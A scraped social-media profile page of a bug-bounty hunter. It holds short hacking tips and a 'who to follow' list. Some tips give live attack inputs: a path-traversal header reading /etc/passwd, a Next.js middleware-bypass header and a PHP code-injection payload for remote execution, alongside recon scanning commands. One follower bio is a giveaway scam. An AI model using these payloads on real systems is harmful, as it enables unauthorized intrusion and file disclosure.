Chax @Ch4xcker
Bug bounty learner Joined February 2022-
Tweets1K
-
Followers28
-
Following276
-
Likes140
I've made $500k+ from SSRF vulnerabilities. Here are my tricks:
Improper Authorization🥰
If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: `Accept: ../../../../../../../../../../etc/passwd{{` #bugbountytips
#Tips :- 1- As usual i Fuzzed all live subs using my custom short information disclosure wordlist :- cat live-subs.txt | python3 dirsearch.py -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,j p,aspx,yml,yaml,rar --stdin
Bug-Hunt tips for new hunters - httpx -l subs.txt -ports 81,8000,8080,8443,8888 -title Find apps not running on standard ports. Make changes with ports by a small search over Google and repeat the process Peace and Salam✌️
CVE-2025-29927 Exploitation : X-Nextjs-Data: 1 X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
Found the same bug on two Subdomains :-)
ㅤ 🔥Find all VDP in world wide using this simple dork😎 Dork: (body="/responsible-disclosure" || body="/.well-known/security.txt") && port="443" ✨For more bugbounty & pen testing tips join my telegram channel 🤍 t.me/ShellSec
How to grab all Graphql query/mutation if introspection disabled? 1. Download all js files to directory js_files 2. Run this command: grep -Eo '(query|mutation) [a-zA-Z0-9_]+\(' js_files -R 1/n #bugbountytips #graphql
#Tips :- 1- Replace dirsearch w-list with my short info disclosure w-list :- github.com/wadgamaraldeen… ( updated continuesly) 2- Type :- cat live-subs.txt | python3 dirsearch.py -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,j p,aspx,yml,yaml,rar --stdin
Day 4 of My Bug Bounty Journey No hunt today — focused purely on learning! 📚 ➔ JS File Recon 🔍 ➔ GraphQL deep dive 🧬 ➔ DVWA + DVGA lab setup 🛠️ ➔ TryHackMe CVE room ✔️ ➔ Dive into API Hacking ➔ Resources attached ⬇️ #BugBounty Full notes 📒: github.com/n4itr0-07/dail…
This is the quickest RCE I've ever gotten. The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an #RCE as a surprise. Payload: `&**='.print((`id`)).'` #BugBounty
Steps: 1. Get all urls (waymore) 2. Extract all Parameters (paramspider) 3. Use nuclei dast templates nuclei -l parameter_based_urls.txt -t nuclei-templates/dast/ -dast Post Credit: Mijanur Rahman #hackerone #ethicalhacking #bugbounty #cybersecurity #sqli #xss #infosec
Power of own tools (script writing) #bugbounty #bugbounty #infosec #Hacking
Power of own tools (script writing) #bugbounty #bugbounty #infosec #Hacking https://t.co/CK3L6V6UZA
🟢 𝗣𝗮𝘆𝗹𝗼𝗮𝗱 𝗪𝗶𝘇𝗮𝗿𝗱 An advanced AI assistant utilizing GPT language models to interpret and generate cybersecurity payloads 🔗 payload-wizard.vercel.app
very pleased to announce the release of my new article based on my research that led to CVE-2024-46982 titled: Next.js, cache, and chains: the stale elixir zhero-web-sec.github.io/research-and-t… note: does not cover the latest findings shared in my recent posts enjoy reading;
How i Earned $$$ 1. I got a subdomain it shows 404 2. Fuzz it found /api/v2 it was a swagger ui 3. Checked for xss not vulnerable check for html injection it loads the file, but error came up 4. Changed swagger: "2.0" to openapi: 3.0.0 and html injection executes #bugbounty
Joelle Kris @JoelleKris33052
44 Followers 3K Following
Aditya @aditya_infosec
72 Followers 1K Following Cyber Security Research, Bug Hunter, CTF player ,Python developer,Cyber Law
MAVIS Wanczyk @wanczyk3625
157 Followers 8K Following I won a lottery of huge amount so I’m willing to give out $20,000 to my first 500 followers due the Economy situation…just dm (“MAVIS I FOLLOWED“)
vishastra @vishastra12
516 Followers 2K Following 🌐 Cybersecurity Enthusiast | 📚 Aspiring Cybersecurity Analyst | 🛡️ Ethical Hacker | 💻 Penetration Tester | 🎮 CTF Player | 🚀
Rodriguez @buggiethehunter
2 Followers 135 Following
Dr. Rohit Gautam @hackergautam
17K Followers 295 Following Teaching 100,000+ individuals from 152 counties about cybersecurity! Founder @hacktifycs
Vijay Bhalerao @VijayBhale63483
7 Followers 249 Following
Zayed 🇵🇸 @D0L0RESH4Z3
951 Followers 3K Following Relax, it's just a bunch of 1s and 0s out there, u will be fine.
Lynn @harvey76lynn
314 Followers 3K Following
Abdelrahman Yousef @0xWh0_4m_1_
161 Followers 246 Following
JoelleKanno @JoelleKann75091
47 Followers 2K Following
Lisa @chapplelisa81
254 Followers 3K Following
M.Nithin @Nithin148818
3 Followers 17 Following
AskSBOM @asksbom
168 Followers 2K Following I'm an AI assistant developed by Deepbits. I leverage deep learning, program analysis, and ChatGPT to answer cybersecurity-related questions.
Zer0Beat @Zer0Beat1
23 Followers 738 Following
Bhagavan Bollina 🚩 @XCriminal_
519 Followers 343 Following Cloud Security Researcher | CARTP | eWPTXv2 | CRTP | CCSK | Bugcrowd MVP Q3 2020 #cloudsecurity #microservices #offsec #aws #redteam
Dr. Binary @drbinaryai
205 Followers 1K Following Your Security Operations Team, on AI! Not just tools — real digital teammates that protects your systems 24/7 and simplify complex cybersecurity tasks.
Tech Pirates @leelaradhe
4 Followers 54 Following
Dr Gerhard Knecht, Ph... @GerhardKnecht
14K Followers 11K Following Cybersec. & Audit VP, Global CISO, Global Head MSS, Prof. Speaker, TV appearance, Top 10 UK security personality 2010, Compliance guru, AI, Followback Security.
Erik Donker @kire_devs_hacks
605 Followers 457 Following I develop stuff and I hack things. #6 Microsoft MSRC 2024 Most Valuable Researcher. Two times consecutive #1 Dynamics 365/Power Platform security researcher.
Sri Nighasa @SriNighasa
21 Followers 22 Following Sri Nighasa a common account to youtube , X, Facebook and instagram
DarkShadow @darkshadow2bd
3K Followers 18 Following Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer. 🔥~For more Join my New telegram Channel👉🏼 https://t.co/9p1yvzluA4 ✨
Mustafa Adam Gamarald... @wadgamaraldeen
3K Followers 829 Following (Work Hard 💪 = Dream Big💡) WEB Applications Penetration Tester 💻☠️🖤 Junior PHP Developer{}
Maddy 🐝 @Cyb3rMaddy
27K Followers 264 Following Cyber Security Content Creator 🛜 Technical Tutorials 🚨 Security News 📺 100k+ on YouTube 👇
Nishant Bhagat @Nishantbhagat57
1K Followers 1K Following CSE Student | Security Researcher | #SIH2022 Winner - Team Lead
Nekrom @Nekrom__
265 Followers 858 Following Bug Bounty & Red Teaming Tips and Tricks 💻 #Cybersecurity #BugBounty #BugBountyTips #RedTeam
Clandestine @akaclandestine
49K Followers 5K Following | Security | Osint | Threat Research | Opsec | Threat Intelligence | Infosec | Threat Hunting | Humint |
David Bate @divadbate
397 Followers 279 Following Teacher, golang dabbler, and wannabe security researcher.
Sina Yeganeh @Sin4Yeganeh
4K Followers 371 Following
Nagli @galnagli
39K Followers 482 Following Hacker; Head of Threat Exposure at @wiz_io 🧙♂️; Bug Bounty Hunter; Live Hacking Events Winner
Abdelrhman Amin🇵�... @0xUchihamrx
2K Followers 723 Following Penetration Tester @BuguardLLC | Bug Hunter If you can't do whatever you want, you can't call yourself 'Hacker'.
João Gomes (zig_shar... @JoaoGomes12243
2K Followers 243 Following 24 | I am nothing, God has everything | 🇦🇴 | white hat hacker @Hacker0x01 | Aberto à colaboração 🤝
Fox_threatintel @banthisguy9349
14K Followers 261 Following Just a person who is against cyber crime and dictators like Putin
Coffin @coffinxp7
25K Followers 207 Following 🕵🏻♂️| ꜱᴇᴄᴜʀɪᴛʏ ʀᴇꜱᴇᴀʀᴄʜᴇʀ | ᴄᴏɴᴛᴇɴᴛ ᴄʀᴇᴀᴛᴏʀ | ᴡʀɪᴛᴇᴜᴘꜱ: https://t.co/xRCKfLzQG7 |ᴡᴇʙꜱɪᴛᴇ: https://t.co/pjFfqTxbZO | ᴄᴏᴍᴍᴜɴɪᴛʏ: https://t.co/5p05U7h0BM
NeM0x00 @Yousef39960629
472 Followers 414 Following Security Researcher 👾 write a code that breaks Programmers code
VakeelSaab⚖️ @karunasagarllb
14K Followers 295 Following Advocate || Swayamsevak || Nationalist || Analyst || Strategist || Speaker || Tweets prsnl, 🔄 not endorsment || स्वयंमेव मृगेन्द्रत
mokusou @Mokusou4
681 Followers 170 Following ✝️ | 🇯🇵 | bug bounty hunter |🗣 日本語, English, Français | So Sakaguchi
Suryesh 🇮🇳 @Suryesh_92
1K Followers 522 Following Security Researcher | HackWithSuryesh | https://t.co/Y3UySjPQKl
Dr. Rohit Gautam @hackergautam
17K Followers 295 Following Teaching 100,000+ individuals from 152 counties about cybersecurity! Founder @hacktifycs
Quadra_v69 @Quadra_v69
842 Followers 157 Following {𝕏} security researcher | bug bounty hunter | ethical hacker ( ˘︹˘ ) dell HOF | realpage HOF | korton HOF | nasa HOF https://t.co/2QJw7lTsMa
My Space! @Supakiad_Mee
2K Followers 243 Following
Suyash Sharma @SuyashS91823422
2K Followers 288 Following Security Engineer| Helping companies to secure their digital assets
Frans Rosén @fransrosen
43K Followers 897 Following Co-founder of @centrahq/@detectify/@poweredbyingrid. I do not advertise doing hacking services, do not trust the ones telling you I do.
Akash Sarkar @0xhunster
1K Followers 284 Following Ethical Hacker by Passion 💀 | Security Researcher | Gaming Non-Stop | Noob 👻
Binit Ghimire @WHOISbinit
2K Followers 1K Following 🦸♂️ Software Engineer | Doing Offensive Security and DevSecOps! 🇳🇵
Hasan Khan @Hasan_Khan0X
1K Followers 2K Following Software & Web Application Penetration Security Testing Engineer | Bug Bounty Hunter | White Hat Hacker | Cyber Security Expert
Anand Ranganathan @ARanganathan72
1.3M Followers 2K Following Author: The Land of the Wilted Rose (Rupa). Love & Honour; The Rat Eater (Bloomsbury). Soufflé (Penguin). Consulting Editor: Swarajya. RTs, Likes ≠ Endorsements
Rajiv N Singh @rajns2817
221 Followers 654 Following A Proud Gandhian and Nehruvian, Anti Fascism, Committed to strengthening the country, andh bhakts stay away
Bug Hunter Labs @BugHunterLabs
2K Followers 681 Following
drak3hft7 @drak3hft7
3K Followers 324 Following Bug Hunter & Penetration Tester | Synack Red Team Member | Top 10 Yeswehack
Zayed 🇵🇸 @D0L0RESH4Z3
951 Followers 3K Following Relax, it's just a bunch of 1s and 0s out there, u will be fine.
Smilehacker @_smile_hacker_
3K Followers 366 Following Full-time Bug Bounty hunter | Ex- HackerOne |
SheilaC @SheilaChebetN
301 Followers 200 Following Electrical engineer Hacking the planet, full time, in pink. Always curious, constantly learning. Bug bounty Hunter on @bugcrowd and @hacker0x01
Hussein Daher @HusseiN98D
49K Followers 197 Following Entrepreneur, Hacker 🇱🇧🇨🇮 @WebImmunify 21th/270000 BugCrowd Hacking PlatformTrends for United States
You might like
